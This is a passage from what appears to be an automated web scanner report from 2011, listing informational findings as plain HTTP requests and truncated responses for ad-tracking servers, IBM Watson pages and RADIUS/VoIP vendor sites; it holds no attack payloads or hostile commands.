Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 644
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:01:06 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...

26.39. http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /passback/iframe/221/tmz/300x250/6/meld.html

Request

GET /passback/iframe/221/tmz/300x250/6/meld.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 683
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:01:25 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...

26.40. http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /passback/iframe/221/tmz/728x90/6/meld.html

Request

GET /passback/iframe/221/tmz/728x90/6/meld.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 987
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:01:03 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...

26.41. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.pubmatic.com
Path:   /AdServer/AdDisplayTrackerServlet

Request

GET /AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=http://clk.atdmt.com/go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/01 HTTP/1.1
Host: track.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOwzAIheGrRMy1ZB4G7G5OG58mypap6t0L3f5P4okPidBzw.hij40EAYd2biEOEBtEDrzL4bWXNuFlTHuVudYce3XlZZTTPHZF9RT.ytIoU.mRLfK6zzPS8k.F8vcHhFgZ0Q--%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:38:14 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 137

<html> <meta http-equiv="refresh" content="0.5;url=http://clk.atdmt.com/go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/01" /> </html>

26.42. http://uac.advertising.com/wrapper/aceUACping.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uac.advertising.com
Path:   /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=50772453&rk1=49226856&rk2=1316239456.221&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Sat, 17 Sep 2011 01:56:55 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:02:51 GMT
Content-Length: 2793
Connection: close

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

26.43. http://widgets.mobilelocalnews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.mobilelocalnews.com
Path:   /

Request

GET /?uid=42b39fdb198522d2bfc6b1f64cd98365 HTTP/1.1
Host: widgets.mobilelocalnews.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:05 GMT
Server: Apache
X-Server-Name: doapp-www-07
Connection: close
Content-Type: text/html
Content-Length: 8309


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Bo
...[SNIP]...

26.44. http://www-03.ibm.com/innovation/us/watson/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-03.ibm.com
Path:   /innovation/us/watson/

Request

GET /innovation/us/watson/ HTTP/1.1
Host: www-03.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ted.com/webcast/archive/event/ibmwatson
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; __utma=137873206.1339650129.1316220891.1316220891.1316220891.1; __utmb=137873206.3.10.1316220891; __utmc=137873206; __utmz=137873206.1316220891.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:04 GMT
Server: IBM_HTTP_Server/7.0.0.15
Accept-Ranges: bytes
Cache-Control: max-age=10
Expires: Fri, 16 Sep 2011 19:56:14 GMT
Content-Type: text/html
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Age: 0
Content-Length: 24915

<!DOCTYPE html>
<html lang="en">
<head>

<meta charset="utf-8">
<!--<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">-->

<meta http-equiv="PICS-Label" content='(PICS-1.1 "http://www.
...[SNIP]...

26.45. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-03.ibm.com
Path:   /innovation/us/watson/watson-for-a-smarter-planet/index.html

Request

GET /innovation/us/watson/watson-for-a-smarter-planet/index.html HTTP/1.1
Host: www-03.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/us/en/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:25:37 GMT
Server: IBM_HTTP_Server/7.0.0.15
Accept-Ranges: bytes
Cache-Control: max-age=10
Expires: Fri, 16 Sep 2011 19:25:47 GMT
Content-Type: text/html
Content-Length: 12985
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Age: 1799

<!DOCTYPE html>
<html lang="en">
<head>

<meta charset="utf-8">
<!--<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">-->

<meta http-equiv="PICS-Label" content='(PICS-1.1 "http://www.
...[SNIP]...

26.46. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/smarter-answers-for-a-smarter-planet.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-03.ibm.com
Path:   /innovation/us/watson/watson-for-a-smarter-planet/smarter-answers-for-a-smarter-planet.html

Request

GET /innovation/us/watson/watson-for-a-smarter-planet/smarter-answers-for-a-smarter-planet.html HTTP/1.1
Host: www-03.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/watson-schematic.html
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; __utma=137873206.1339650129.1316220891.1316220891.1316220891.1; __utmb=137873206.2.10.1316220891; __utmc=137873206; __utmz=137873206.1316220891.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:54:57 GMT
Server: IBM_HTTP_Server/7.0.0.15
Accept-Ranges: bytes
Cache-Control: max-age=10
Expires: Fri, 16 Sep 2011 19:55:07 GMT
Content-Type: text/html
Content-Length: 12729
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Age: 0

<!DOCTYPE html>
<html lang="en">
<head>

<meta charset="utf-8">
<!--<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">-->

<meta http-equiv="PICS-Label" content='(PICS-1.1 "http://www.
...[SNIP]...

26.47. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/watson-schematic.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-03.ibm.com
Path:   /innovation/us/watson/watson-for-a-smarter-planet/watson-schematic.html

Request

GET /innovation/us/watson/watson-for-a-smarter-planet/watson-schematic.html HTTP/1.1
Host: www-03.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/index.html
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; __utma=137873206.1339650129.1316220891.1316220891.1316220891.1; __utmb=137873206.1.10.1316220891; __utmc=137873206; __utmz=137873206.1316220891.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:54:44 GMT
Server: IBM_HTTP_Server/7.0.0.15
Accept-Ranges: bytes
Cache-Control: max-age=10
Expires: Fri, 16 Sep 2011 19:54:54 GMT
Content-Type: text/html
Content-Length: 11009
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Age: 0

<!DOCTYPE html>
<html lang="en">
<head>

<meta charset="utf-8">
<!--<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">-->

<meta http-equiv="PICS-Label" content='(PICS-1.1 "http://www.
...[SNIP]...

26.48. http://www.advancedvoip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedvoip.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:37 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

26.49. http://www.advancedvoip.com/images/voip_billing_solution_partner_bp.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedvoip.com
Path:   /images/voip_billing_solution_partner_bp.jpg

Request

GET /images/voip_billing_solution_partner_bp.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:36 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

26.50. http://www.alepo.com/isp-billing.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alepo.com
Path:   /isp-billing.shtml

Request

GET /isp-billing.shtml HTTP/1.1
Host: www.alepo.com
Proxy-Connection: keep-alive
Referer: http://www.radius-server.com/products.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alepo_cookie=http%3A//www.radius-server.com/%23%23%23%23undefined%23%23%23%239%5C16%5C111%23%23%23%23%20%23%23%23%23%23%23%23%23-5%3A0; __utma=18704489.631393116.1316220585.1316220585.1316220585.1; __utmb=18704489.3.10.1316220585; __utmc=18704489; __utmz=18704489.1316220585.1.1.utmcsr=radius-server.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:49:10 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 17320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...

26.51. http://www.alepo.com/radius-server.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alepo.com
Path:   /radius-server.shtml

Request

GET /radius-server.shtml HTTP/1.1
Host: www.alepo.com
Proxy-Connection: keep-alive
Referer: http://www.radius-server.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:47 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 19654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...

26.52. http://www.alepo.com/wifi.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alepo.com
Path:   /wifi.shtml

Request

GET /wifi.shtml HTTP/1.1
Host: www.alepo.com
Proxy-Connection: keep-alive
Referer: http://www.alepo.com/radius-server.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=18704489.631393116.1316220585.1316220585.1316220585.1; __utmb=18704489.1.10.1316220585; __utmc=18704489; __utmz=18704489.1316220585.1.1.utmcsr=radius-server.com|utmccn=(referral)|utmcmd=referral|utmcct=/; alepo_cookie=http%3A//www.radius-server.com/%23%23%23%23undefined%23%23%23%239%5C16%5C111%23%23%23%23%20%23%23%23%23%23%23%23%23-5%3A0

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:52 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 20910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...

26.53. http://www.aradial.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aradial.com
Path:   /

Request

GET / HTTP/1.1
Host: www.aradial.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:31 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 07:01:21 GMT
ETag: "fca81c5-4378-4d490141"
Accept-Ranges: bytes
Content-Length: 17272
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>Radius Server software and AAA RADIUS billing systems - Aradial</TITLE>
<meta name="description" content="RADI
...[SNIP]...

26.54. http://www.aradial.com/aradial-radius-server-billing-corporate.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aradial.com
Path:   /aradial-radius-server-billing-corporate.html

Request

GET /aradial-radius-server-billing-corporate.html HTTP/1.1
Host: www.aradial.com
Proxy-Connection: keep-alive
Referer: http://www.aradial.com/aradial-radius-server-billing-customers.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=23544170.1980425115.1316220328.1316220328.1316220328.1; __utmb=23544170; __utmc=23544170; __utmz=23544170.1316220328.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:10 GMT
Server: Apache
Last-Modified: Sun, 10 May 2009 13:49:52 GMT
ETag: "fca8488-2005-4a06db80"
Accept-Ranges: bytes
Content-Length: 8197
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>Aradial Technolgies - Aradial Radius Server Corporate Profile</TITLE>
<meta name="description" content="Radius
...[SNIP]...

26.55. http://www.aradial.com/aradial-radius-server-billing-customers.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aradial.com
Path:   /aradial-radius-server-billing-customers.html

Request

GET /aradial-radius-server-billing-customers.html HTTP/1.1
Host: www.aradial.com
Proxy-Connection: keep-alive
Referer: http://www.aradial.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=23544170.1980425115.1316220328.1316220328.1316220328.1; __utmb=23544170; __utmc=23544170; __utmz=23544170.1316220328.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:45:23 GMT
Server: Apache
Last-Modified: Sun, 10 May 2009 13:43:06 GMT
ETag: "fca8489-29a4-4a06d9ea"
Accept-Ranges: bytes
Content-Length: 10660
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>Aradial Radius Server Customers</TITLE>
<meta name="description" content="Radius Server (AAA) and Billing Solu
...[SNIP]...

26.56. http://www.aradial.com/aradial-radius-server-billing-home-content.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aradial.com
Path:   /aradial-radius-server-billing-home-content.html

Request

GET /aradial-radius-server-billing-home-content.html HTTP/1.1
Host: www.aradial.com
Proxy-Connection: keep-alive
Referer: http://www.aradial.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:34 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 11:38:12 GMT
ETag: "fca848e-109e-4dc7d224"
Accept-Ranges: bytes
Content-Length: 4254
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>Radius Server (AAA server), Diameter Server and Convergent Billing</TITLE>
<meta name="description" content="
...[SNIP]...

26.57. http://www.aradial.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aradial.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.aradial.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=23544170.1980425115.1316220328.1316220328.1316220328.1; __utmb=23544170; __utmc=23544170; __utmz=23544170.1316220328.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:44:39 GMT
Server: Apache
Last-Modified: Thu, 11 Nov 2004 22:24:09 GMT
ETag: "fca84a9-2ee-4193e689;4e64dd24"
Accept-Ranges: bytes
Content-Length: 750
Content-Type: text/html

<head>
<title>&#1488;&#1514;&#1512; &#1496;&#1497;&#1508;&#1493;&#1500;&#1497;&#1501;</title>
</head>
<SCRIPT LANGUAGE="JavaScript">
<!--
if(window.top==self) {
location.href = "/"
}
//-->
...[SNIP]...

26.58. http://www.att.com/navservice/navservlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.att.com
